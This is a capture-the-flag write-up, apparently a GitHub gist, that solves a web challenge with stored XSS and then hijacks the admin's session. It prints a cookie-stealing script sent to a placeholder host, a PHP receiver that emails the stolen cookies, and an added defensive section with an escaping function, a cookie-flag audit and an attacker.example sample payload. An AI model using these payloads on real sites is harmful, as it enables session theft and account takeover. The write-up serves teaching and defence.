@CSRessel
Last active August 29, 2015 14:10
secure_page_service

Summary

This problem is a simple XSS challenge. Using persistent XSS in a newly created page, we can steal the admin’s cookies should they choose to visit the page. The “Report to Moderator” button says, “Report this page, and a moderator will personally review it in the next few minutes!” so it is a safe assumption that we can have an admin view our injected code.

Recon

The first thing we need is an account on the challenge’s site. The home page allows anyone to register. After an account is made, two actions are available: create a page, and view a page. Attempting to view the page asked for in the problem shows it is password protected. A couple quick queries show it is not vulnerable to SQL injection; another route is necessary.

Examining the page creation by creating a couple random pages, we notice that we can report pages to be reviewed by a moderator (“Spam? Abuse? Report this page, and a moderator will personally review it in the next few minutes!”).

Furthermore, attempting to use HTML tags reveals that the input allows HTML code.

Enter XSS

We can use a persistent XSS attack to steal the cookies of whoever views the page. By injecting a script into the page, we can send the viewer’s cookies elsewhere. By setting up a PHP script on a free hosting service, we can forward the received cookies to our own email. The final step will be to report the page to a moderator so that they view our injected page.

Once we have the admin’s cookies, we can change our cookies to theirs to view the locked page.

The Setup

First we need the two scripts.

The injected script for the page will be:

<script>location.href = 'http://www.YourDomainName.com/cookiestealer.php?cookie='+document.cookie;</script>

And the php script at the above domain name (cookiestealer.php) will look like:

<?php
// $HTTP_GET_VARS was removed in PHP 5.4; $_GET is the equivalent on current hosts.
$cookie = $_GET["cookie"];
mail("YourEmail@YouMailProvider.com", "Stolen Cookies", $cookie);
?>

For free hosting, a number of options are available. We chose to use 000webhost, simply because they have a nice in-browser file manager—no need to mess around with FTP clients.
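For contrast, the two server-side fixes that would have closed this challenge's hole are shown below. This is an added example written for this writeup, not code from the challenge or from the original gist: a hypothetical page renderer that HTML-escapes the user-supplied body (so the injected script above is stored as harmless text), and a Set-Cookie audit that flags a session cookie missing HttpOnly (which is what lets document.cookie hand the session to injected script), Secure, and SameSite. The sample payload and cookie headers are constructed for the example.

```javascript
// Added example (not from the original writeup): defences against the stored
// XSS and cookie theft described above.

// Escape the characters that change meaning in HTML text and attribute contexts.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical page renderer: the challenge site echoed the body verbatim;
// escaping on output turns a stored <script> tag into literal text.
function renderUserPage(title, body) {
  return `<h1>${escapeHtml(title)}</h1>\n<div class="body">${escapeHtml(body)}</div>`;
}

// Parse one Set-Cookie header into its name/value pair and the attributes
// relevant to session protection.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    httpOnly: false,
    secure: false,
    sameSite: null,
  };
  for (const attr of attrs) {
    const [key, val] = attr.split('=');
    const k = key.toLowerCase();
    if (k === 'httponly') cookie.httpOnly = true;
    else if (k === 'secure') cookie.secure = true;
    else if (k === 'samesite') cookie.sameSite = val;
  }
  return cookie;
}

// Return a list of findings for a session cookie header; empty means hardened.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.httpOnly) findings.push('missing HttpOnly: document.cookie exposes the session to injected script');
  if (!c.secure) findings.push('missing Secure: cookie is also sent over plaintext HTTP');
  if (!c.sameSite) findings.push('missing SameSite: set Lax or Strict');
  return findings;
}

// Constructed sample input mirroring the writeup's payload shape.
const injectedBody =
  "<script>location.href='http://attacker.example/cookiestealer.php?cookie='+document.cookie;</script>";

console.log(renderUserPage('My page', injectedBody));
console.log(auditSessionCookie('PHPSESSID=abc123; Path=/'));
console.log(auditSessionCookie('PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax'));
```

Escaping on output is the fix for the page body; HttpOnly is the defence in depth, since a script that does run can no longer read the session cookie, and the "Cookie Forgery" step below would have nothing to work with.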

Cookie Forgery

After setting up a page with the injected script and the php script on another server, we simply report the page to have a mod (in reality a bot) view the page.

From here, we check our email for the admin cookies. Using a cookie-editor plugin like EditThisCookie (https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en) or a similar one, we can quickly change our cookies to the admin's, allowing us to view the locked page, and thus, the flag:

wow_cross_site_scripting_is_such_web
